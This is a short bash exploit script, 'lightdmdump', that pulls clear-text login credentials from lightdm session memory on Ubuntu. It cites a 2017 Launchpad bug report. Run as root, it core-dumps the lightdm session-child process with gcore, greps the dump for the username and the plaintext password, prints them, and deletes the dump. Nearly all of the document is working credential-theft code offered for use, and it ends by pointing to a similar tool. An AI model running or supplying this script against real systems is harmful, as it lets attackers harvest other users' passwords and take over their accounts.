Dump clear text passwords from lightdm sessions on Ubuntu

lightdmdump

#!/bin/bash
# lightdmdump
# ---
# Dump clear text passwords from lightdm sessions on Ubuntu
# Requires root privileges to dump lightdm process memory
# Tested on Ubuntu 14.04.1 LTS and 16.04.4 LTS
# ---
# Bug discovered by: Sven Blumenstein
# Disclosure date: 2017-09-15
# Source: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490
# Exploit: bcoles
# ---
# # ./lightdmdump 
# USER=test
# PASSWORD=secretpw
# ---
set -euo pipefail
IFS=$'\n\t'

fatal() { echo -e "\\033[1;31m[FATAL]\\033[0m  $*"; exit 1 ; }

is_root () {
  if [ "${EUID}" -ne 0 ] ; then
     fatal "This script must be run as root" 
  fi
}

find_pid () {
  PID=$(ps ax | grep lightdm | grep session-child | cut -d\  -f2)
  if [ -z "$PID" ] ; then
    fatal "Could not find lightdm PID"
  fi
  #echo "Found lightdm PID: ${PID}"
}

dump_mem () {
  gcore ${PID} > /dev/null 2>&1
  CORE="core.${PID}"
  if [ ! -f "${CORE}" ] ; then
    fatal "Could not dump lightdm process memory"
  fi
  #echo "Dumped PID ${PID} process memory to ${CORE}"
}

dump_creds () {
  USER=$(strings "${CORE}" | grep -E "^USER=(.*)$" | head -n 1)
  PASSWORD=$(strings "${CORE}" | egrep "^_pammodutil_getspnam_.*_2\$" -A 1 | tail -n 1)
  if [ -z $PASSWORD ] ; then
    echo "Could not find password"
  else
    echo "${USER}"
    echo "PASSWORD=${PASSWORD}"
  fi
}

cleanup () { rm "${CORE}" ; }

main () {
  is_root
  find_pid
  dump_mem
  trap cleanup EXIT
  dump_creds
}

main "$@"

Note: mileage may vary. See mimipenguin instead.